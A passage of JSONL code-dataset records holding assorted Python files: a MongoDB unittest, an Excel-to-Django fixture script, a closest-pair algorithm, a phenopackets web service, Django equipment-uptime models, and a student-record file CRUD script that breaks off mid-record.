+{"seq_id":"397992916","text":"# coding=utf-8\n\"\"\"\nmongodb and useful function tools unittest\n :copyright: (c) 2015 by fangpeng.\n :license: MIT, see LICENSE for more details.\n\"\"\"\n__date__ = '1/23/16'\nimport unittest\nimport motor\n\nfrom Tenglish.db import mongo_obj, mongodb\nfrom Tenglish.tests.testutils.mongo_unit import MongoUnitTest\n\n\nclass MongoDBTestCase(MongoUnitTest):\n def test_db(self):\n self.assertIsInstance(mongodb, motor.MotorDatabase)\n\n def test_auth_db(self):\n self.assertIsInstance(mongodb.auth_db, motor.MotorCollection)\n\n def test_mongo_obj(self):\n schema = {\n 'name': (str, True),\n 'id': (int, True)\n }\n\n @mongo_obj(schema)\n def get_obj(data):\n return data\n\n self.assertIn('id', get_obj({'name': 'BeginMan', 'id': 1001}))\n self.assertIn('name', get_obj({'name': 'BeginMan'}))\n self.assertIn('name', get_obj({'name': u'BeginMan'}))\n self.assertIn('name', get_obj({}))\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"Tenglish/tests/db/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"95517687","text":"import os\nimport json\nimport urllib.request\nimport openpyxl\nfrom slugify import slugify\nfrom pprint import pprint\n\n\ndef save_images(data):\n\topener=urllib.request.build_opener()\n\topener.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n\turllib.request.install_opener(opener)\n\tfull_file_path = os.path.join(\"/Users/Jr/desktop/development-folder/marketplace/src/fixtures/images\", \"{0}.jpg\".format(data[\"slug\"]))\n\treturn urllib.request.urlretrieve(data[\"photo_link\"], full_file_path)\n\n\n\ndef create_fixture_file(data, file_name):\n\twith open(file_name, \"w\") as f:\n\t\tjson.dump(data, f, indent=4)\n\n\ndef generate_template(data):\n\tfixture_data = {\n\t\t\"pk\": data['pk'],\n\t\t\"fields\": {\n\t\t \"warning\": \"dfknakdf\",\n\t\t \"added_date\": \"2016-12-04T23:37:04Z\",\n\t\t \"weight\": data['weight'],\n\t\t \"brand\": data['brand'],\n\t\t \"active\": True,\n\t\t \"description\": data['desc'],\n\t\t \"categories\": data['category'],\n\t\t \"default\": None,\n\t\t \"sales_price\": None,\n\t\t \"price\": \"12.99\",\n\t\t \"title\": data['name'],\n\t\t \"featured\": False,\n\t\t \"slug\": data[\"slug\"]\n\t\t },\n\t\t\"model\": \"products.product\"\n\t}\n\n\treturn fixture_data\n\n\ndef get_excel_data(workbook):\n\tvalid_data = {}\n\tdup_data = {}\n\tdata_list = []\n\tphoto_data = []\n\tpk_counter = 0\n\n\twb = openpyxl.load_workbook(workbook)\n\tsheet = wb.get_sheet_by_name('Supplements')\n\n\tfor row in range(3, sheet.max_row + 1):\n\t\tpk_counter += 1\n\t\ttry:\n\t\t\tname = sheet['A' + str(row)].value.title()\n\t\t\tbrand = sheet['B' + str(row)].value.title()\n\t\t\tweight = sheet['C' + str(row)].value\n\t\t\tcategory = [int(x) for x in sheet['E' + str(row)].value.strip(\" \").split(\",\") if x]\n\t\t\tdesc = sheet['F' + str(row)].value\n\t\t\tphoto_link = sheet['G' + str(row)].value\n\n\t\t\tif name not in valid_data:\n\t\t\t\tvalid_data[name] = {\n\t\t\t\t\t\"name\": name,\n\t\t\t\t\t\"brand\": brand,\n\t\t\t\t\t\"weight\": weight,\n\t\t\t\t\t\"desc\": desc,\n\t\t\t\t\t\"category\": category,\n\t\t\t\t\t\"pk\": pk_counter,\n\t\t\t\t\t\"photo_link\": photo_link,\n\t\t\t\t\t\"slug\": slugify(name)\n\t\t\t\t}\n\t\t\t\tphoto_data.append(valid_data[name])\n\t\t\t\t# save_images(valid_data[name])\n\t\t\t\tdata_list.append(generate_template(valid_data[name]))\n\t\t\telse:\n\t\t\t\tdup_data[name] = {\n\t\t\t\t\t\"name\": name,\n\t\t\t\t\t\"brand\": brand,\n\t\t\t\t\t\"weight\": weight,\n\t\t\t\t\t\"desc\": desc,\n\t\t\t\t\t\"pk\": pk_counter,\n\t\t\t\t\t\"photo_link\": photo_link,\n\t\t\t\t\t\"slug\": slugify(name)\n\t\t\t\t}\n\t\texcept Exception as e:\n\t\t\tprint(e, row, name)\n\t\t\tpass\n\treturn (data_list, dup_data, photo_data)\n\ndef create_product_image_file():\n\twith open('photo-data.json') as data_file: \n\t\tdata = json.load(data_file)\n\t\tjson_list = []\n\t\tfor i in data:\n\t\t\ti[\"abs_path\"] = os.path.join(\"/Users/Jr/desktop/development-folder/marketplace/src/fixtures/images\", \"{0}.jpg\".format(i[\"slug\"]))\n\t\t\tjson_list.append(i)\n\n\twith open('photo-data.json', 'w') as f:\n\t json.dump(json_list, f)\n\n\n# get_excel_data('product-list.xlsx')\ncreate_fixture_file(get_excel_data('product-list.xlsx')[0], \"inital-data.json\")\ncreate_fixture_file(get_excel_data('product-list.xlsx')[1], \"duplicate-data.json\")\ncreate_fixture_file(get_excel_data('product-list.xlsx')[2], 
\"photo-data.json\")\ncreate_product_image_file()\n\n\n","sub_path":"fixtures/get_excel_data.py","file_name":"get_excel_data.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"57755014","text":"#!/usr/bin/python\n\n# James Hollister \n# Finds the closest pair using brute force and divide and conquer\n\nimport math\nimport sys\n\nclass Point:\n def __init__(self, x=0, y=0):\n self.x = x\n self.y = y\n\ndef distance(P1, P2):\n return math.sqrt((P1.x - P2.x)**2 + (P1.y - P2.y)**2)\n\ndef nearest_neighbor_brute(A):\n \"\"\"Takes a list of Points and returns the closest pair\"\"\"\n if (len(A) < 2):\n return 0\n minimum = distance(A[0], A[len(A)-1])\n for i in range(len(A)-1):\n for j in range(i+1, len(A)):\n dist = distance(A[i], A[j])\n if (dist < minimum):\n minimum = dist\n return minimum\n\ndef nearest_neighbor_div(A):\n \"\"\"Takes a list of Points and returns the closest pair\"\"\"\n return _nearest_neighbor_div(sorted(A, key=lambda point: point.x), \\\n sorted(A, key=lambda point: point.y))\n \ndef _nearest_neighbor_div(X, Y):\n \"\"\"Takes two list of Points containing the same values,\n sorted by x and y, respectively, and returns the closest pair\"\"\"\n length = len(X)\n if length <= 3:\n return nearest_neighbor_brute(X)\n mid = int(length / 2)\n midPoint = X[mid]\n Yleft = []\n Yright = []\n for i in Y:\n if i.x <= midPoint.x: \n Yleft.append(i)\n else:\n Yright.append(i)\n \n minLeft = _nearest_neighbor_div(X[:mid], Yleft)\n minRight = _nearest_neighbor_div(X[mid:], Yright)\n d = min(minLeft, minRight)\n\n middle = []\n for point in Y:\n if point.x > (midPoint.x - d) and point.x < (midPoint.x + d):\n middle.append(point)\n if len(middle) > 1:\n # traverse through list of middle points\n # only need to look at max 7 points in front of every point\n for i in range(len(middle) - 1):\n for j in range(i+1, min(i+8, len(middle))):\n dist = distance(middle[i], middle[j])\n if dist < d:\n d = dist\n return d\n\n\ndef main():\n if (len(sys.argv) < 2):\n print (\"Enter a file as a command line argument\")\n sys.exit(1)\n for arg in sys.argv[1:]:\n A = []\n test_file = open(arg)\n print(arg + \":\")\n for line in test_file:\n point = line.strip().split(\" \")\n A.append(Point(float(point[0]), float(point[1])))\n closest = nearest_neighbor_div(A)\n print(closest)\n file_name = arg[:arg.find(\".\")] + \"_distance.txt\"\n answer_file = open(file_name, \"w\")\n answer_file.write(str(closest) + \"\\n\")\n answer_file.close()\n test_file.close()\n\n\nmain()\n\n\n","sub_path":"p1/nearest_neighbor.py","file_name":"nearest_neighbor.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"282336414","text":"#!/usr/local/bin/python3\n\nimport cgi, cgitb\nimport json, yaml\nfrom os import environ, path, pardir\nimport sys, datetime, argparse\n\n# local\ndir_path = path.dirname( path.abspath(__file__) )\npkg_path = path.join( dir_path, pardir )\nsys.path.append( pkg_path )\nfrom beaconServer.lib import *\nfrom beaconServer.lib.service_utils import *\n\n\"\"\"podmd\n\npodmd\"\"\"\n\n################################################################################\n################################################################################\n################################################################################\n\ndef main():\n\n phenopackets()\n \n################################################################################\n\ndef phenopackets():\n\n byc = initialize_service()\n\n for p_k, p_v in byc[\"these_prefs\"][\"parameters\"].items():\n # TODO: parameter checks ...\n if p_k in byc[\"form_data\"]:\n byc.update( { p_k: byc[\"form_data\"][p_k] } )\n\n select_dataset_ids(byc)\n check_dataset_ids(byc)\n get_filter_flags(byc)\n parse_filters(byc)\n\n parse_variants(byc)\n get_variant_request_type(byc)\n generate_queries(byc)\n\n create_empty_service_response(byc) \n response_collect_errors(byc)\n cgi_break_on_errors(byc)\n\n ds_id = byc[ \"dataset_ids\" ][ 0 ]\n response_add_parameter(byc, \"dataset\", ds_id )\n \n execute_bycon_queries( ds_id, byc )\n query_results_save_handovers(byc)\n\n access_id = byc[\"query_results\"][\"biosamples._id\"][ \"id\" ]\n\n h_o, e = retrieve_handover( access_id, **byc )\n h_o_d, e = handover_return_data( h_o, e )\n if e:\n response_add_error(byc, 422, e )\n\n access_id_ind = byc[\"query_results\"][\"individuals._id\"][ \"id\" ]\n ind_s = [ ]\n h_o_ind, e_ind = retrieve_handover( access_id_ind, **byc )\n h_o_d_ind, e_ind = handover_return_data( h_o_ind, e_ind )\n\n var_data = [ ]\n access_id_var = [ ]\n\n if \"variantsaccessid\" in byc[\"form_data\"]:\n access_id_var = byc[\"form_data\"][\"variantsaccessid\"]\n elif \"variants._id\" in byc[\"query_results\"]:\n access_id_var = byc[\"query_results\"][\"variants._id\"][\"id\"]\n if len(access_id_var) > 1:\n h_o_var, e_var = retrieve_handover( access_id_var, **byc )\n var_data, e_var = handover_return_data( h_o_var, e_var )\n\n results = [ ]\n\n for i_s in h_o_d_ind:\n\n pxf = {\n \"id\": \"pxf__\"+i_s[\"id\"],\n \"subject\": i_s[\"id\"],\n \"biosamples\": [ ]\n }\n\n # TODO: method here retrieves & reformats the biosamples\n pxf_bs = list(filter(lambda d: d[\"individual_id\"] == i_s[\"id\"], h_o_d))\n for bs in pxf_bs:\n p_bs = {\n \"id\": bs[\"id\"],\n \"externalReferences\": [ ],\n }\n if \"histological_diagnosis\" in bs:\n p_bs.update( { \"histologicalDiagnosis\": bs[\"histological_diagnosis\"]})\n if \"sampledTissue\" in bs:\n p_bs.update( { \"sampledTissue\": bs[\"sampledTissue\"]})\n if \"external_references\" in bs:\n p_bs.update( { \"externalReferences\": bs[\"external_references\"]})\n\n # TODO: The `digest` here is just a minimal drop-in representation.\n # HGVS cannot be used since it doesn't allow DUP ...\n if len(var_data) > 0:\n bs_vars = list(filter( lambda x : x['biosample_id'] == bs[\"id\"], var_data ) )\n if \"progenetix\" in byc[\"variant_format\"]:\n p_bs.update( { \"variants\": bs_vars } )\n else:\n p_bs.update( { \"variants\": [ ] } )\n for v in bs_vars:\n if \"digest\" in byc[\"variant_format\"]:\n p_bs[\"variants\"].append( v[\"digest\"] )\n\n pxf[\"biosamples\"].append( p_bs )\n\n results.append( pxf )\n\n populate_service_response( byc, 
results)\n cgi_print_response( byc, 200 )\n\n################################################################################\n################################################################################\n\nif __name__ == '__main__':\n main()\n","sub_path":"services/phenopackets.py","file_name":"phenopackets.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
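The per-individual `filter(lambda d: d["individual_id"] == ...)` call above rescans the full biosample list once per individual; a one-pass index keyed on `individual_id` is a common alternative. A standalone sketch with hypothetical records shaped like the `h_o_d` / `h_o_d_ind` handover payloads:

```python
from collections import defaultdict

# Hypothetical handover payloads, mirroring h_o_d_ind and h_o_d above.
individuals = [{"id": "ind1"}, {"id": "ind2"}]
biosamples = [
    {"id": "bs1", "individual_id": "ind1"},
    {"id": "bs2", "individual_id": "ind1"},
    {"id": "bs3", "individual_id": "ind2"},
]

# One pass over the biosamples builds the index ...
by_individual = defaultdict(list)
for bs in biosamples:
    by_individual[bs["individual_id"]].append(bs)

# ... so assembling each phenopacket becomes a dictionary lookup.
for i_s in individuals:
    pxf = {"id": "pxf__" + i_s["id"], "subject": i_s["id"],
           "biosamples": by_individual[i_s["id"]]}
    print(pxf["id"], len(pxf["biosamples"]))
```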
+{"seq_id":"321765573","text":"from datetime import timedelta, datetime, date\nfrom django.db import models\nfrom bitfield import BitField\n\nfrom ..constants import STATE_FLAGS, EVENT_CHOICES, STATE_CHOICES, STATE_SET\nfrom ..utils import req_date, stat_timedelta_for_report\n\n\nclass EquipmentManager(models.Manager):\n\n def get_queryset(self):\n return super(EquipmentManager, self).get_queryset().select_related('journal')\n\n\nclass Equipment(models.Model):\n\n \"\"\"\n Модель производственных единиц от Предприятия до Детали Оборудования\n \"\"\"\n plant = models.ForeignKey('self', blank=True, null=True, verbose_name='установка',\n related_name='parts', on_delete=models.CASCADE)\n name = models.CharField(max_length=50, verbose_name='на��менование')\n\n def __str__(self):\n if self.plant is None:\n plant_name = '\\\\'\n else:\n plant_name = self.plant\n return '{0} - {1}'.format(plant_name, self.name)\n\n class Meta:\n db_table = 'equipment'\n ordering = ['plant_id', 'name']\n verbose_name = 'оборудование'\n verbose_name_plural = 'оборудование'\n\n objects = EquipmentManager()\n\n @property\n def journal_id(self):\n if '_journal_cache' in self.__dict__:\n if self._journal_cache:\n return self._journal_cache.id\n else:\n return None\n else:\n return None\n\n @property\n def is_alive(self):\n res = True\n if self.journal_id:\n if self.journal.events.filter(event_code='sps'):\n res = False\n return res\n\n def unit_tree(self, only_alive=False):\n \"\"\"\n Description: Метод строит дерево (список) подчиненных объектов, включая отступ\n глубины вложенности.\n \"\"\"\n def get_knot_dict(units):\n res = {}\n for unit in units:\n if unit.plant_id in res:\n res[unit.plant_id].append(unit)\n else:\n res[unit.plant_id] = [unit]\n return res\n\n def get_tree(knot_dict, tree, ident=0, node=None):\n if node:\n if only_alive and not node.is_alive:\n return\n tree.append((node, ident))\n ident += 1\n for eq in knot_dict[node.id if node else None]:\n if eq.id in knot_dict:\n get_tree(knot_dict, tree, ident, eq)\n else:\n # Проверка для оборудования без составляющих\n if only_alive and not eq.is_alive:\n continue\n tree.append((eq, ident))\n\n units = Equipment.objects.all()\n tree = []\n knot_dict = get_knot_dict(units)\n get_tree(knot_dict, tree, 0, self)\n return tree\n\n def collect_sub_stat_on_date(self, stat_date):\n \"\"\"\n Description: Метод собирает все наличествующие записи статистики для дерева\n журналов (на базе дерева оборудования) от указанного узла.\n \"\"\"\n eq_list = self.unit_tree(only_alive=True)\n # Собрать все номера журналов для вычисленного дерева оборудования\n journal_set = {\n eq.journal_id for eq, ident in eq_list\n if eq.journal_id and not eq.journal.stat_by_parent\n }\n # для запроса существующих записей на дату\n records = Record.objects.filter(rdate=req_date(stat_date), journal_id__in=journal_set).all()\n journals_records = {rec.journal_id: rec for rec in records}\n res = []\n for eq, ident in eq_list:\n row = {}\n if eq.journal_id and not eq.journal.stat_by_parent:\n row['name'] = eq.name\n row['journal_id'] = eq.journal_id\n row['ident'] = ident\n if eq.journal_id in journals_records:\n row['rec_data'] = journals_records[eq.journal_id].data_dict()\n row['has_data'] = True\n else:\n row['rec_data'] = {'rdate': stat_date, 'up_cnt': 0, 'down_cnt': 0}\n for st_name, st_flag in eq.journal.control_flags:\n row['rec_data'][st_name] = '0:00'\n row['has_data'] = False\n res.append(row)\n elif not eq.journal_id:\n row['name'] = eq.name\n row['ident'] = ident\n res.append(row)\n 
return res\n\n\nclass JournalManager(models.Manager):\n\n def get_queryset(self):\n return super(JournalManager, self).get_queryset().select_related()\n\n\nclass Journal(models.Model):\n\n \"\"\"\n Модель Журнала записей статистики работы/простоя по конкретному\n оборудованию\n \"\"\"\n\n equipment = models.OneToOneField(Equipment, on_delete=models.CASCADE,\n related_name='journal', verbose_name='Оборудование')\n stat_by_parent = models.BooleanField(default=False, verbose_name='Статистика по установке')\n control_flags = BitField(\n flags=STATE_FLAGS,\n verbose_name='контроль',\n default=1\n )\n description = models.TextField(blank=True)\n\n objects = JournalManager()\n journal = JournalManager()\n\n class Meta:\n db_table = 'journals'\n ordering = ['equipment__name']\n verbose_name = 'журнал'\n verbose_name_plural = 'журналы'\n default_permissions = []\n permissions = (\n ('view_journal_details', 'View journal details'),\n ('view_journal_list', 'View journal list'),\n ('update_journal_description', 'Update journal description'),\n ('create_journal_record', 'Create record'),\n ('edit_journal_record', 'Edit record'),\n ('delete_journal_record', 'Delete record'),\n ('create_journal_event', 'Create journal event'),\n ('delete_journal_event', 'Delete journal event'),\n )\n\n @property\n def is_deregister(self):\n ev = self.events.order_by('-date').all()\n if ev and ev[0].event_code == 'sps':\n return True\n else:\n return False\n\n @property\n def state_cnt(self):\n return sum(1 for _ in filter(lambda x: x[1], self.control_flags))\n\n @property\n def state_list(self):\n return list(map(lambda x: x[0], filter(lambda x: x[1], self.control_flags)))\n\n def __str__(self):\n plant_name = self._equipment_cache.plant.name if self._equipment_cache.plant else '-'\n return plant_name + ' \\ ' + self._equipment_cache.name\n\n def write_record(self, rdate, **rdata):\n \"\"\"\n Description: Метод создает новую запись (или обновляет существующую)\n на основе входного словаря.\n \"\"\"\n # Разделяем словарь входных данных на то, что относится к записи\n # и то, что к интревалам\n rec_keys = rdata.keys() & {'rdate', 'down_cnt', 'up_cnt'}\n interval_keys = rdata.keys() & STATE_SET\n rec_argv = {key: rdata[key] for key in rec_keys}\n # Пробуем найти запись на эту дату\n try:\n rec = self.records.filter(rdate=req_date(rdate))[0]\n # Проверяем изменение данных записи\n changed_fields = []\n for name in rec_keys:\n if rec.__getattribute__(name) != rec_argv[name]:\n changed_fields.append(name)\n rec.__setattr__(name, rec_argv[name])\n rec.save(update_fields=changed_fields)\n # Изменяем (удаляем -> создаем) интервалы\n rec.intervals.all().delete()\n for key in interval_keys:\n rec.__setattr__(key, rdata[key])\n\n except IndexError:\n rec = self.records.create(rdate=req_date(rdate), **rec_argv)\n for key in interval_keys:\n rec.__setattr__(key, rdata[key])\n return rec\n\n def get_last_records(self, depth=10):\n \"\"\"\n Description: Метод возвращает выборку последних записей на нужную глубину.\n \"\"\"\n if self.stat_by_parent:\n return self.equipment.plant.journal.get_last_records(depth)\n else:\n return self.records.order_by('-rdate')[:depth]\n\n def switch_date_get_rec(self, curent_date_local, offset_str):\n \"\"\"\n Description: Метод переключает дату от заданной на нужное смещение\n и возвращает запись на новую дату при наличии.\n \"\"\"\n cur_date = datetime.strptime(curent_date_local, '%d.%m.%Y')\n new_date = cur_date + timedelta(int(offset_str))\n rset = 
self.records.filter(rdate=new_date.strftime(\"%Y-%m-%d\"))\n if rset.exists():\n return rset[0], new_date.strftime(\"%d.%m.%Y\")\n else:\n return None, new_date.strftime(\"%d.%m.%Y\")\n\n def delete_record(self, record_id):\n \"\"\"\n Description: Метод удаляет существующую запись статистики.\n \"\"\"\n rec = self.records.get(pk=record_id)\n rec.delete()\n\n def get_record_data(self, record_id):\n \"\"\"\n Description: Метод получения данных для инициализации полей формы\n существующей записью\n \"\"\"\n rec = self.records.get(pk=record_id)\n return rec.data_dict()\n\n def set_event_data(self, data):\n self.events.create(\n date=data['date'],\n event_code=data['event_code'])\n\n # Методы для формирования отчетов\n\n def get_stat(self, from_date=None, to_date=None, state_code='wrk', round_to_hour=True, sum_wrk_hrs=True):\n \"\"\"\n Description: Метод расчета суммарного времени нахождения в некотором состоянии\n (по умолчанию в работе) на временном интервале\n \"\"\"\n r_set = self.records\n if from_date:\n r_set = r_set.filter(rdate__gte=from_date)\n if to_date:\n r_set = r_set.exclude(rdate__gte=to_date)\n # По техническому заданию горячий резерв суммируется к работе в отчетах\n if state_code == 'wrk' and sum_wrk_hrs:\n r_set = r_set.filter(models.Q(intervals__state_code='wrk') | models.Q(intervals__state_code='hrs'))\n else:\n r_set = r_set.filter(intervals__state_code=state_code)\n total = r_set.aggregate(models.Sum('intervals__time_in_state'))['intervals__time_in_state__sum']\n return stat_timedelta_for_report(total, round_to_hour)\n\n def state_stat(self, from_date=None, to_date=None, round_to_hour=True, sum_wrk_hrs=True):\n \"\"\"\n Description: Метод расчета статистики нахождения во всех возможных состояниях\n на временном интервале (по умолчанию с ввода по текущий момент времени).\n Дополнтительно - число пусков и остановов.\n \"\"\"\n res = { state: self.get_stat(from_date, to_date, state, round_to_hour) for state in self.state_list }\n\n return res\n\n def full_stat(self):\n \"\"\"\n Dscription: Метод получения полной статистики для страницы журнала,\n включая пуски и остановы.\n \"\"\"\n try:\n evt = self.events.filter(event_code='zmn')[0]\n dt_from = evt.date.isoformat()\n except IndexError:\n dt_from = None\n if self.stat_by_parent:\n journal = self.equipment.plant.journal\n else:\n journal = self\n res = journal.state_stat(from_date=dt_from, round_to_hour=False)\n if dt_from:\n q_res = journal.records.filter(rdate__gte=dt_from).aggregate(\n models.Sum('up_cnt'),\n models.Sum('down_cnt'))\n else:\n q_res = journal.records.aggregate(\n models.Sum('up_cnt'),\n models.Sum('down_cnt'))\n res['down_cnt'] = q_res['down_cnt__sum']\n res['up_cnt'] = q_res['up_cnt__sum']\n return res\n\n def get_journal_or_subjournal(self, part_name=None):\n if part_name:\n eq = self.equipment\n try:\n part = eq.parts.filter(name=part_name)[0]\n return part.journal if part.journal else None\n except IndexError:\n return None\n else:\n return self\n\n def get_report_cell(self, summary_type='ITV', from_event='FVZ', date_to=None, date_from=None, round_to_hour=True):\n from_event_to_event_dict = {\n 'FVZ': 'zmn',\n 'FKR': 'vkr',\n 'FSR': 'vsr',\n 'FRC': 'vrc',\n }\n journal = self.equipment.plant.journal if self.stat_by_parent else self\n rec_set = journal.records # Начитаем готовить query_set здесь он еще не выполняется\n try:\n date_from_event = self.events.filter(\n event_code=from_event_to_event_dict[from_event]\n ).order_by('-date')[0].date\n if summary_type == 'DT':\n return 
date_from_event.strftime(\"%d.%m.%Y\")\n except IndexError:\n date_from_event = None\n if from_event != 'FVZ':\n return '-'\n elif summary_type == 'DT':\n return '-'\n if date_from_event:\n # Время \"от события\" откатываем на начало месяца, поскольку\n # капитальный и средный ремонты, замены и реконструкции\n # длятся не менее месяца, а раньше интервалы фиксировались\n # за месяц или год, что приводит к неверному расчету\n date_from_event = date(date_from_event.year, date_from_event.month, 1)\n # Теперь нужно выбрать дату от которой плясать\n # Если задано время начала отчета и было вычислено время \"от события\" - надо выбрать одно из двух\n if date_from and date_from_event:\n y, m, d = map(lambda x: int(x), date_from.split('-'))\n date_from = date_from if date(y, m, d) > date_from_event else date_from_event\n rec_set = rec_set.filter(rdate__gt=date_from)\n elif date_from:\n # Если задано время начала отчета, но нет времени события - использовать его как начало\n rec_set = rec_set.filter(rdate__gt=date_from)\n elif date_from_event:\n date_from = date_from_event\n rec_set = rec_set.filter(rdate__gt=date_from)\n\n # Если не задано ни то ни другое время - считаем все записи, предшествующие времени, т.е. не используем условие\n\n if date_to:\n rec_set = rec_set.exclude(rdate__gte=date_to)\n else:\n rec_set = rec_set.exclude(rdate__gte=date.today())\n if summary_type == 'PCN':\n cnt = rec_set.aggregate(models.Sum('up_cnt'))['up_cnt__sum']\n return str(cnt) if cnt else '-'\n elif summary_type == 'OCN':\n cnt = rec_set.aggregate(models.Sum('down_cnt'))['down_cnt__sum']\n return str(cnt) if cnt else '-'\n else:\n return journal.get_stat(\n from_date=date_from,\n to_date=date_to,\n state_code='wrk',\n round_to_hour=round_to_hour,\n )\n\n\nclass RecordManager(models.Manager):\n\n def get_queryset(self):\n return super(RecordManager, self).get_queryset().prefetch_related('intervals')\n\n\nclass StateDescriptor:\n\n def __init__(self, state_code):\n self.state_code = state_code\n\n def __get__(self, instance, owner):\n try:\n for interval in instance._prefetched_objects_cache['intervals']:\n if interval.state_code == self.state_code:\n return interval.stat_time\n except (AttributeError, KeyError):\n q_set = instance.intervals.filter(state_code=self.state_code)\n if q_set.exists():\n return q_set[0].stat_time\n else:\n return '0:00'\n return '0:00'\n\n def __set__(self, instance, value):\n if isinstance(value, str):\n try:\n hr, mnt = value.split(':')\n interval = timedelta(hours=int(hr), minutes=int(mnt))\n except ValueError:\n return 'Bad value for timedelta'\n elif isinstance(value, timedelta):\n interval = value\n else:\n return 'Bad value for timedelta'\n if interval != timedelta(0):\n instance.intervals.create(state_code=self.state_code, time_in_state=interval)\n\n\nclass Record(models.Model):\n\n journal = models.ForeignKey('Journal', on_delete=models.CASCADE,\n related_name='records')\n rdate = models.DateField()\n up_cnt = models.IntegerField(default=0)\n down_cnt = models.IntegerField(default=0)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n records = RecordManager()\n objects = RecordManager()\n\n class Meta:\n db_table = 'records'\n\n def data_dict(self):\n \"\"\"\n Description: Метод получения данных для инициализации полей формы\n существующей записью\n \"\"\"\n data = {}\n data['rdate'] = self.rdate.strftime('%d.%m.%Y')\n data['up_cnt'] = self.up_cnt\n data['down_cnt'] = self.down_cnt\n for st_name, st_flag in 
self.journal.control_flags:\n if st_flag:\n data[st_name] = self.__getattribute__(st_name)\n else:\n data[st_name] = '0:00'\n return data\n\n# Добавление динамических атрибутов для класса Record для обращения по имени состояния\n# Добавим новые состояния - изменится состав атрибутов\nfor state_name in STATE_SET:\n setattr(Record, state_name, StateDescriptor(state_name))\n\n\nclass IntervalItem(models.Model):\n\n record = models.ForeignKey('Record',\n related_name='intervals',\n on_delete=models.CASCADE)\n state_code = models.CharField(max_length=3,\n choices=STATE_CHOICES,\n default='wrk',\n db_index=True)\n time_in_state = models.DurationField()\n\n class Meta:\n db_table = 'intervals'\n default_permissions = []\n\n def __str__(self):\n return '%s>%s' % (self.state_code, self.stat_time)\n\n @property\n def stat_time(self):\n sec = self.time_in_state.total_seconds()\n hours, remainder = divmod(sec, 3600)\n minutes, sec = divmod(remainder, 60)\n return '%d:%02d' % (int(hours), int(minutes))\n\n\nclass EventItem(models.Model):\n\n \"\"\"\n Модель Отражение события жизненного цикла\n из предопределенного набора: [Ввод, Списание, Замена]\n \"\"\"\n\n journal = models.ForeignKey('Journal',\n related_name='events',\n on_delete=models.CASCADE)\n date = models.DateField()\n event_code = models.CharField(max_length=3,\n choices=EVENT_CHOICES)\n\n class Meta:\n db_table = 'event_items'\n default_permissions = []\n","sub_path":"etools/apps/uptime/models/journal_models.py","file_name":"journal_models.py","file_ext":"py","file_size_in_byte":20963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
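The `StateDescriptor` + `setattr` loop above is a general Python pattern: one data-descriptor instance per state name turns `record.wrk` into a lookup against that record's intervals. A minimal standalone sketch, with a plain dict standing in for the Django related manager:

```python
from datetime import timedelta

class StateDescriptor:
    """Expose one state's interval as an attribute on the owning class."""
    def __init__(self, state_code):
        self.state_code = state_code

    def __get__(self, instance, owner):
        return instance.intervals.get(self.state_code, timedelta(0))

    def __set__(self, instance, value):
        instance.intervals[self.state_code] = value

class Record:
    def __init__(self):
        self.intervals = {}  # stands in for the intervals related manager

# One descriptor per state name, as done for the Django model above.
for state_name in ("wrk", "hrs", "rsv"):
    setattr(Record, state_name, StateDescriptor(state_name))

rec = Record()
rec.wrk = timedelta(hours=7, minutes=30)
print(rec.wrk, rec.hrs)  # 7:30:00 0:00:00
```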
+{"seq_id":"428646536","text":"db = 'student.txt'\r\n\r\ndef insert(file_name, stud_name, roll_no, marks):\r\n num_lines = sum(1 for line in open(file_name))\r\n if num_lines == 0:\r\n stud_id = 1\r\n else:\r\n stud_id = num_lines + 1\r\n with open(file_name, 'a') as af:\r\n af.write(\"{},{},{},{}\\n\".format(stud_id, stud_name, roll_no, marks))\r\n print(\"Record Inserted !\")\r\n\r\n\r\ndef update(file_name, std_id, name, roll_no, marks):\r\n with open(file_name, 'r') as rf:\r\n lst_tuples = []\r\n for line in rf:\r\n line = tuple(line.strip('\\n').split(','))\r\n lst_tuples.append(line)\r\n # print(len(lst_tuples))\r\n if len(lst_tuples) == 0:\r\n print(\"Data Not Found In File\")\r\n return\r\n elif int(std_id) < 1 or int(std_id) > len(lst_tuples):\r\n print(\"Student Id Not Found Database\")\r\n return\r\n else:\r\n with open(file_name, 'w') as wf:\r\n given_id = std_id\r\n given_data = (name, roll_no, marks)\r\n for student in lst_tuples:\r\n stud_id, stud_name, roll_no, marks = student\r\n if stud_id == str(given_id):\r\n stud_name, roll_no, marks = given_data\r\n wf.write(\"{},{},{},{}\\n\".format(stud_id, stud_name, roll_no, marks))\r\n print(\"Record Updated !\")\r\n\r\n\r\ndef delete(file_name, std_id):\r\n with open(file_name, 'r') as rf:\r\n lst_tuples = []\r\n for line in rf:\r\n line = tuple(line.strip('\\n').split(','))\r\n lst_tuples.append(line)\r\n # print(len(lst_tuples))\r\n\r\n if len(lst_tuples) == 0:\r\n print(\"Data Not Found In File\")\r\n return\r\n elif int(std_id) < 1 or int(std_id) > len(lst_tuples):\r\n print(\"Student Id Not Found Database\")\r\n return\r\n else:\r\n given_id = std_id\r\n for i in lst_tuples:\r\n if i[0] == str(given_id):\r\n lst_tuples.remove(i)\r\n\r\n with open(file_name, 'w') as wf:\r\n for student in lst_tuples:\r\n stud_id, stud_name, roll_no, marks = student\r\n if int(stud_id) > int(given_id):\r\n wf.write(\"{},{},{},{}\\n\".format(int(stud_id) - 1, stud_name, roll_no, marks))\r\n else:\r\n wf.write(\"{},{},{},{}\\n\".format(stud_id, stud_name, roll_no, marks))\r\n\r\n print(\"Record Deleted !\")\r\n\r\n\r\ndef read(file_name):\r\n num_lines = sum(1 for line in open(file_name))\r\n if num_lines == 0:\r\n print(\"No Data Found !\")\r\n else:\r\n with open(file_name, 